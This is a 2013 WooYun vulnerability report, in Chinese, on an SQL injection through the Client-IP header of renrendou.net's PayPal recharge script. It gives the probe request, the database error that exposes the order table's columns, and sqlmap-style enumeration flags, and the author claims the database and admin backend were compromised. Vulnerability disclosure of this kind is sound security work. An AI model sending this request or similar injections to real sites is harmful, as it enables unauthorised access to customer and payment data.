漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-045092
漏洞标题:人人豆海外充值站http头部注入导致数据库沦陷#1
相关厂商:人人豆充值网站
漏洞作者: 无力落地の白
提交时间:2013-12-06 11:15
修复时间:2014-01-20 11:15
公开时间:2014-01-20 11:15
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
158游戏点卡网针对海外用户提供游戏点卡、游戏卡、游戏币、游戏装备、Q币在线购买服务,支持Visa,Master Card,paypal,moneybookers,国际信用卡等多种。
这次我射的是 人人豆 充值的分站, mysql数据库沦陷,后台沦陷。
详细说明:
这次注入是http头部注入,http请求是这样
GET php_paypal/process.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: 1'
Referer: http://renrendou.net/
Cookie: PHPSESSID=s99mk34clkl3ike5kcife5f0k0
Host: renrendou.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
报错 :
Database error: Invalid SQL: INSERT INTO `dingdan` ( `id` , `dingdanid` , `title` , `price` , `zhifu_type` , `money` , `bizhong` , `bizhong_en` , `renrenid` , `paypal` , `paypal_name` , `payment_date` , `paypal_addr` , `paypal_verify` , `residence_country` , `paypal_country` , `create_time` , `zhifu_time` , `faka_time` , `ip` , `country` , `stat` , `isdel` , `queren_time` , `faka_user` , `ka` , `ka_from` ) VALUES ( NULL , '2013120515461134505', '0 人人��? , '0' , 'paypal', '0.00', '', '', '', NULL , NULL , NULL , NULL , '0', NULL , NULL , now(), NULL , NULL , '1'"', '', '0', '0', NULL , NULL , NULL , NULL );
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"', '', '0', '0', NULL , NULL , NULL , NULL )' at line 31)
Session halted.
存在注入点的是 CLIENT-IP 参数
貌似wooyun上发http头部注入的比较少?
新姿势··
漏洞证明:
后台
--dbs
--tables
不截图了。。敏感信息太多。。。我打消心中邪恶的念头 只为wooyun 20RANK 。。求别失望。。
修复方案:
这个找代码开发人员修复吧~
版权声明:转载请注明来源 无力落地の白@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝